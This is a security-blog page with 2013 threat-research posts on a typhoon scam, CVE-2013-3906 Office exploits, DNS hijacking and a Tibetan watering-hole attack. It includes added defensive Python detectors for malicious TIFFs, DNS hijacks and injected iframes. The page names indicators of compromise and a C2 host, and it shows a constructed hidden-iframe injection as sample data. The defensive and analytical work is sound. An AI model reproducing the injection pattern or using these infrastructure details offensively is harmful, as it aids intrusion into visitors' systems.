18 Nov A typhoon worth millions Tatyana Shcherbakova
14 Nov The rush for CVE-2013-3906 - a hot commodity Dmitry Tarakanov
11 Nov CVE-2013-3906 : another 0-day for Microsoft Office Vyacheslav Zakorzhevsky
08 Oct Hackers target high profile domains David Jacoby
24 Sep Exposing the security weaknesses we tend to overlook David Jacoby
In early November Typhoon Haiyan devastated the Philippines with a catastrophic number of victims: several thousand were reported killed and hundreds of thousands were evacuated. A few days after the typhoon struck we detected the first “Nigerian letters” in which scammers exploited the tragedy for their own ends. The author of the letter below pretended to be a driver at a local security company, and his tale of how he became a multi-millionaire sounds plausible enough.
The typhoon supposedly left the driver alone with a cargo of $11.5 million. Realizing that he had lost his security escort and that the money was probably presumed lost, he decided to make the most of his predicament and handed the money to an associate at another security company. In the letter he asks the recipient to help move the valuable cargo out of the Philippines in return for a generous reward. To add a touch of authenticity, the scammer included genuine links to news about the typhoon, mostly from the BBC. Those news articles are the only reliable information in the letter; the story of the newly made millionaire, complete with his name and surname, exists only to deceive an unsuspecting recipient.
Two days ago FireEye reported that the recent CVE-2013-3906 exploit is now being used by threat actors other than the original ones. The new malicious documents share similarities with previously detected exploits but carry a different payload: according to FireEye, they now deliver the Taidoor and PlugX backdoors.
At Kaspersky Lab we have also detected yet another APT group that has just started spreading malicious MS Word documents exploiting CVE-2013-3906. This actor is the Winnti group, which we described in detail here. They have sent spear-phishing emails with an attached document containing the exploit. As usual, the Winnti operators use this technique to deliver their first-stage malware, PlugX.
We became aware of an attack against a gaming company that is constantly targeted by the Winnti group. The MS Word document containing the exploit embeds the same TIFF “picture” (MD5 7dd89c99ed7cec0ebc4afa8cd010f1f1) that triggers the vulnerability as the one used in the Hangover attacks. If exploitation is successful, the PlugX backdoor is downloaded from a remote URL:
On November 5, Microsoft announced a new vulnerability, CVE-2013-3906, which can be exploited when TIFF images are processed. It allows attacks on any software that uses the vulnerable DLL to process TIFF images, including Microsoft Office and Lync. On the same day, there were reports that Microsoft had recorded attacks exploiting CVE-2013-3906.
Several malware samples exploiting CVE-2013-3906 became available to us and we analyzed them in detail. All of them use heap spraying to place their code at address 0x08080808 and then execute it from that location. The exception and the memory overwrite occur in the vulnerable ogl.dll.
Fragment of WinDbg shellcode execution
The exploits we had access to can be divided into two groups according to the shellcode they use.
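Because the trigger in these documents is the embedded TIFF image, a quick triage step is to carve every TIFF out of a suspicious document and compare its hash with the known indicator. The script below is an added example, not code from the original post or from Kaspersky: it walks the TIFF header and IFD chain to determine where each embedded image ends (a TIFF has no length field), hashes exactly that span, and looks up the result in an IOC set seeded with the MD5 quoted above. The one-pixel TIFF and the Office Open XML container it scans are constructed inline so the script runs offline; scanning a real .docx only requires passing its bytes to scan_docx.

```python
"""Carve embedded TIFF images out of a document and hash them against an IOC.

Added example, not code from the original post. A TIFF carries no length field,
so the script walks the header and IFD chain (TIFF 6.0) to find where each image
ends and hashes exactly that span. The sample TIFF and OOXML container are constructed.
"""
import hashlib
import io
import struct
import zipfile

# MD5 of the TIFF that triggers CVE-2013-3906 in the documents described in the post.
KNOWN_TIFF_MD5 = {"7dd89c99ed7cec0ebc4afa8cd010f1f1"}
TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8, 11: 4, 12: 8}
STRIP_OFFSETS, STRIP_BYTE_COUNTS = 273, 279


def tiff_extent(blob, pos):
    """Bytes occupied by the TIFF starting at blob[pos], or 0 if the header is invalid."""
    hdr = blob[pos:pos + 8]
    if len(hdr) < 8 or hdr[:2] not in (b"II", b"MM"):
        return 0
    bo = "<" if hdr[:2] == b"II" else ">"
    magic, ifd = struct.unpack(bo + "HI", hdr[2:])
    if magic != 42:
        return 0
    end, seen = 8, set()
    while 8 <= ifd < len(blob) - pos and ifd not in seen:
        seen.add(ifd)                          # crafted files may loop the IFD chain
        base = pos + ifd
        n = struct.unpack(bo + "H", blob[base:base + 2])[0] if base + 2 <= len(blob) else 0
        if n == 0 or base + 6 + n * 12 > len(blob):   # empty or truncated IFD: keep what we have
            break
        end = max(end, ifd + 6 + n * 12)
        strips = {}
        for i in range(n):
            e = base + 2 + i * 12
            tag, typ, cnt, val = struct.unpack(bo + "HHII", blob[e:e + 12])
            size = TYPE_SIZE.get(typ, 1) * cnt
            if size > 4:                       # value does not fit the entry: stored at offset val
                end = max(end, val + size)
                raw = blob[pos + val:pos + val + size]
            else:
                raw = blob[e + 8:e + 8 + size]
            if tag in (STRIP_OFFSETS, STRIP_BYTE_COUNTS) and typ in (3, 4):
                fmt = bo + ("H" if typ == 3 else "I") * cnt
                if len(raw) >= struct.calcsize(fmt):
                    strips[tag] = struct.unpack(fmt, raw[:struct.calcsize(fmt)])
        for off, cnt in zip(strips.get(STRIP_OFFSETS, ()), strips.get(STRIP_BYTE_COUNTS, ())):
            end = max(end, off + cnt)          # pixel strips normally sit past the IFD
        (ifd,) = struct.unpack(bo + "I", blob[base + 2 + n * 12:base + 6 + n * 12])
    return min(end, len(blob) - pos)


def tiff_hashes(blob):
    """Return (offset, md5) for every TIFF found by magic bytes inside blob."""
    out = []
    for magic in (b"II*\x00", b"MM\x00*"):
        pos = blob.find(magic)
        while pos != -1:
            length = tiff_extent(blob, pos)
            if length:
                out.append((pos, hashlib.md5(blob[pos:pos + length]).hexdigest()))
            pos = blob.find(magic, pos + 1)
    return sorted(out)


def scan_docx(docx_bytes):
    """Map each OOXML member to the MD5s of the TIFFs it embeds."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            hashes = [h for _, h in tiff_hashes(z.read(name))]
            if hashes:
                hits[name] = hashes
    return hits


def match_iocs(hits, known=KNOWN_TIFF_MD5):
    """(member, md5) pairs whose hash is a known indicator."""
    return [(m, h) for m, hs in hits.items() for h in hs if h in known]


def build_sample_tiff():
    """Constructed 1x1 8-bit grayscale little-endian TIFF (sample input)."""
    tags = [(256, 3, 1), (257, 3, 1), (258, 3, 8), (259, 3, 1), (262, 3, 1),
            (273, 4, 0), (277, 3, 1), (278, 3, 1), (279, 4, 1)]
    data_off = 8 + 6 + 12 * len(tags)          # one pixel strip right after the IFD
    ifd = struct.pack("<H", len(tags))
    for tag, typ, val in tags:
        val = data_off if tag == STRIP_OFFSETS else val
        ifd += struct.pack("<HHI", tag, typ, 1) + (struct.pack("<H", val) + b"\0\0" if typ == 3 else struct.pack("<I", val))
    return b"II*\0" + struct.pack("<I", 8) + ifd + struct.pack("<I", 0) + b"\x80"


def build_sample_docx(tiff):
    """Constructed minimal OOXML container with the TIFF under word/media/."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/media/image1.tiff", tiff)
    return buf.getvalue()


if __name__ == "__main__":
    hits = scan_docx(build_sample_docx(build_sample_tiff()))
    print(hits, "IOC matches:", match_iocs(hits))
```

The extent walk matters for legacy .doc files, where the image is embedded in an OLE stream rather than stored as its own zip member: hashing from the magic bytes to the end of the stream would never match the indicator, while hashing the span the IFD actually references does. Matching on a single MD5 is of course only a first pass; a recompressed or re-encoded copy of the same image will not match.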
In recent days several high-profile domains have been defaced, including the domains of two prominent security companies and sites such as alexa.com, whatsapp.com and redtube.com. From our quick analysis it does not appear that the web servers themselves were compromised; the most likely attack vector is that the domains' DNS was hijacked.
Looking into this, there are some fairly obvious traces but nothing that really confirms what the attackers did or what information they were able to obtain. Analyzing previous compromises and defacements suggests a “new” trend among hacking groups and defacers: going after the DNS or the domain registrar instead of compromising the web server itself. A quick analysis of the domain turned up two indicators that stood out.
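A registrar-level hijack leaves traces in the DNS itself even when the web server is untouched, so a defender's first move is to compare the current delegation and records against a known-good baseline. The check below is an added example, not code from the original post, and it does not claim to reproduce the two indicators the post refers to. It compares the NS set the registrar delegates at the TLD (ns_parent) with the NS set the zone itself answers (ns_zone), checks whether the web host's A records still fall inside the owner's known prefixes, and flags a collapsed TTL. The snapshots are constructed, not real lookups, and the field names are this example's own convention; in practice they would be filled from queries to the TLD servers and to the zone's authoritative servers.

```python
"""Check DNS snapshots for the indicators of a registrar/DNS hijack.

Added example, not code from the original post. The snapshots are constructed:
a baseline taken while the domain was known-good and a current view. ns_parent is
the NS set delegated at the TLD, ns_zone the NS set the zone's own servers answer,
a the web host's A records, ttl their TTL. These field names are this example's own.
"""
import ipaddress

# Constructed baseline: delegation and in-zone NS agree, web host in a known prefix.
BASELINE = {
    "ns_parent": {"ns1.hosting.example", "ns2.hosting.example"},
    "ns_zone": {"ns1.hosting.example", "ns2.hosting.example"},
    "a": {"203.0.113.10"},
    "ttl": 3600,
    "known_prefixes": ["203.0.113.0/24"],
}

# Constructed hijacked view: delegation repointed at the registrar, zone data left behind.
HIJACKED = {
    "ns_parent": {"ns1.attacker.example", "ns2.attacker.example"},
    "ns_zone": {"ns1.hosting.example", "ns2.hosting.example"},
    "a": {"198.51.100.77"},
    "ttl": 60,
}


def assess(baseline, current, low_ttl=300):
    """Return a list of (indicator, detail) tuples; an empty list means nothing stood out."""
    findings = []
    parent, zone = set(current["ns_parent"]), set(current["ns_zone"])
    added = parent - set(baseline["ns_parent"])
    if added:
        findings.append(("delegation_changed", sorted(added)))
    if parent != zone:
        # The registrar/TLD side and the zone side disagree: one of them was edited
        # on its own, which is what a registrar-account takeover looks like from outside.
        findings.append(("delegation_zone_mismatch", sorted(parent ^ zone)))
    nets = [ipaddress.ip_network(p) for p in baseline.get("known_prefixes", [])]
    strays = sorted(ip for ip in current["a"]
                    if not any(ipaddress.ip_address(ip) in n for n in nets))
    if strays:
        findings.append(("a_record_outside_known_hosting", strays))
    if current["ttl"] < low_ttl and current["ttl"] < baseline["ttl"]:
        # Hijackers set very short TTLs so the redirect propagates, and can be reverted, fast.
        findings.append(("ttl_collapsed", current["ttl"]))
    return findings


if __name__ == "__main__":
    for name, detail in assess(BASELINE, HIJACKED):
        print(name, detail)
```

The delegation/zone mismatch is the most telling of the four, because a legitimate nameserver migration updates both sides, while an attacker who only holds the registrar account can change only the parent delegation. Run against a clean snapshot the function returns an empty list, so it can sit in a periodic monitor without tuning.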
As security analysts we are often asked: “What threats and vulnerabilities do you expect us to see in the future?” This is an interesting question, but it is also an indication that the way we think about and discuss IT security is fundamentally wrong. Do we really need to invest time and resources in future threats when we are still vulnerable to attacks that have been discussed for over 20 years?
If you look at some of the major breaches of the past, the attackers did not use zero-day vulnerabilities. Likewise, very few exploit kits actually carry exploits for zero-day vulnerabilities. To analyze this in depth, Kaspersky researcher David Jacoby joined forces with Outpost24’s CSO Martin Jartelius, gaining access to the vulnerability management vendor's unique statistics on technical risk exposure, and performed several security audits that included both social engineering tests and penetration tests. Everything was performed without exploiting any vulnerabilities.
When we started analyzing the statistics, it did not take long for our theories to be confirmed. We looked at the frequency of old vulnerabilities, that is, which vulnerabilities we are actually still exposed to. We chose to include statistics for Sweden and the Benelux countries in this report.
The statistics show that we are quite good at protecting ourselves against new vulnerabilities, but strangely we tend to forget about older ones: some systems are still exposed to vulnerabilities more than 10 years old.
Another interesting question is: “What systems are we actually trying to secure?” Critical infrastructure is a hot topic, but what other kinds of “public resources” might be critical? What about hotels, for example? Or hospitals? Or radio stations?
When doing research it is important to get real facts, and one way to do that is to get your hands dirty. During our research we also wanted to run a practical challenge for a few companies from different industries. The idea was to visit the companies and perform a security audit against a pre-defined checklist based on the results of the research. Our goal was to check whether they had any systems vulnerable to old threats and to review their security routines, along with a number of additional tests. However, only a handful of companies wanted to participate. We both think this is one of today's key problems: we spend rather more time on new, exciting vulnerabilities and threats than on taking care of the real problems. We decided to run the challenge anyway, and the results were pretty interesting.
Read the full research paper here.
We are currently seeing a spam run that uses a fake CNN report claiming that the US has started bombing Syria.
Clicking the shortened link leads to an exploit kit that targets older, vulnerable versions of Adobe Reader and Java. The attackers favor the Java exploit over the Reader exploit, as Java exploits are generally more reliable.
The exploit downloads a Trojan-Downloader onto the system, which subsequently fetches various other malware.
Money mule recruitment emails are nothing new; they have been spammed all over the globe for years. What is new is the recent wave aimed at “English-speaking Japanese residents”. It started at the end of July and we have received hundreds of such spam emails since then.
The content typically promises an easy job requiring only a few hours per week and very little else.
During the last week, several spear-phishing e-mails were sent to multiple Uyghur activists. Here’s an example:
A snippet of code on the Central Tibetan Administration website redirects Chinese-speaking visitors to a Java exploit that drops an APT-related backdoor. For context, the site describes the administration as “...the Central Tibetan Administration (CTA) of His Holiness the Dalai Lama, this is the continuation of the government of independent Tibet.” The placement of the malicious code is fairly extraordinary, so let's dive in.
The attack is precisely targeted: an iframe appended to the page redirects visitors of “xizang-zhiye(dot)org” (the Chinese-language version of the site) to a Java exploit that carries a backdoor payload. The English and Tibetan versions of the site do not contain this iframe; only the Chinese version does (please do not visit it at this time). At this point the few systems attacked with this code appear to be located in China and the US, although there could be more. The Java exploit being delivered is the 212 KB “YPVo.jar” (edd8b301eeb083e9fdf0ae3a9bdb3cd6), which also contains, drops and executes the backdoor. That file is a 397 KB Win32 executable, “aMCBlHPl.exe” (a6d7edc77e745a91b1fc6be985994c6a), detected as “Trojan.Win32.Swisyn.cyxf”. Backdoors with the Swisyn verdict are frequently part of APT-related toolchains, and this one most certainly is.
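An iframe appended after the closing body tag, pointing off-site and sized or styled to be invisible, is the classic shape of a watering-hole injection, and it is cheap to audit for. The script below is an added example, not code from the original post or from the compromised site: it parses a page with the standard-library HTMLParser and reports iframes that are third-party, near-zero in size, hidden by CSS, or placed after </body>. The page it audits is constructed, and “redirect.example” is a placeholder host, not the real exploit server.

```python
"""Flag iframes that look injected, such as one appended after </body>.

Added example, not code from the original post. The page below is constructed;
"redirect.example" is a placeholder, not the real host that served the exploit.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


def _tiny(value):
    """True for width/height attributes of at most one pixel."""
    try:
        return value is not None and float(str(value).strip().rstrip("px")) <= 1
    except ValueError:
        return False


class IframeAuditor(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.after_body = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        reasons = []
        host = (urlparse(a.get("src") or "").hostname or "").lower()
        if host and host != self.page_host and not host.endswith("." + self.page_host):
            reasons.append("third-party src " + host)
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("near-zero size")
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if self.after_body:
            # Injected code is usually appended to the file, so it lands after the body.
            reasons.append("appended after </body>")
        if reasons:
            self.findings.append((a.get("src"), reasons))

    def handle_endtag(self, tag):
        if tag == "body":
            self.after_body = True


def audit(html, page_host):
    """Return [(src, [reason, ...])] for every suspicious iframe in html."""
    parser = IframeAuditor(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed page: one legitimate same-site embed, one injected hidden iframe.
SAMPLE_HTML = """<html><head><title>Sample</title></head>
<body>
<p>Content</p>
<iframe src="/video/embed.html" width="560" height="315"></iframe>
</body></html>
<iframe src="http://redirect.example/loader.html" width="0" height="0" style="display: none"></iframe>
"""

if __name__ == "__main__":
    for src, reasons in audit(SAMPLE_HTML, "xizang-zhiye.org"):
        print(src, "->", ", ".join(reasons))
```

Running this against each language variant of a site, with the same page host, makes the asymmetry described above visible immediately: the Chinese version would return one finding with all four reasons, the English and Tibetan versions none. Note that it only catches static markup; an iframe created by obfuscated JavaScript needs a rendered DOM or a proxy log to spot.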
The Java exploit appears to attack the older CVE-2012-4681 vulnerability, which is a bit of a surprise, but it was used by the actor that distributed the original CVE-2012-4681 0-day classes Gondzz.class and Gondvv.class in August of last year. The 4681 exploit code can be seen in the image above, along with code that sets the JVM SecurityManager to null to disable Java's policy checks and then runs the Payload.main method. Payload.main contains some interesting but simple capabilities that let an attacker download the payload over HTTPS and AES-decrypt it using Java's built-in crypto libraries, but the package is not configured to use that code in this case. Instead, a couple of lines in its configuration file direct the exploit to drop and execute the Win32 EXE resource from the JAR. The backdoor itself is detected by most of the AV crowd as a variant of a gaming password stealer, which is flatly incorrect. The related C2 is located at news.worldlinking.com (18.104.22.168).
This threat actor has been quietly running these sorts of watering hole attacks for at least a couple of years, alongside standard spear-phishing campaigns against a variety of targets that include Tibetan groups. Our KSN community recorded related events going back at least to a busy late 2011 season. We have also seen Apple-related Java exploits served from this host targeting the more recent CVE-2013-2423.
UPDATE 2013.08.13: The Chinese version of the site at “xizang-zhiye(dot)org” appears to have been cleaned up and has not served any malicious code that I can find over the past day. The administrators appear to have cleaned everything up early on Tuesday their time (late Monday in the West) and there are no indications of any return since. We will continue to monitor the site for signs of compromise.
Around a year ago I posted about the most common web attacks in Spain and how the malware was spread. It is time for an update!
We regularly collect data on infected websites based on our KSN detections. Apart from the general verdicts I usually find at the top of the ranking, another one in the top three for the last few months caught my eye: Trojan.JS.Iframe.aeq.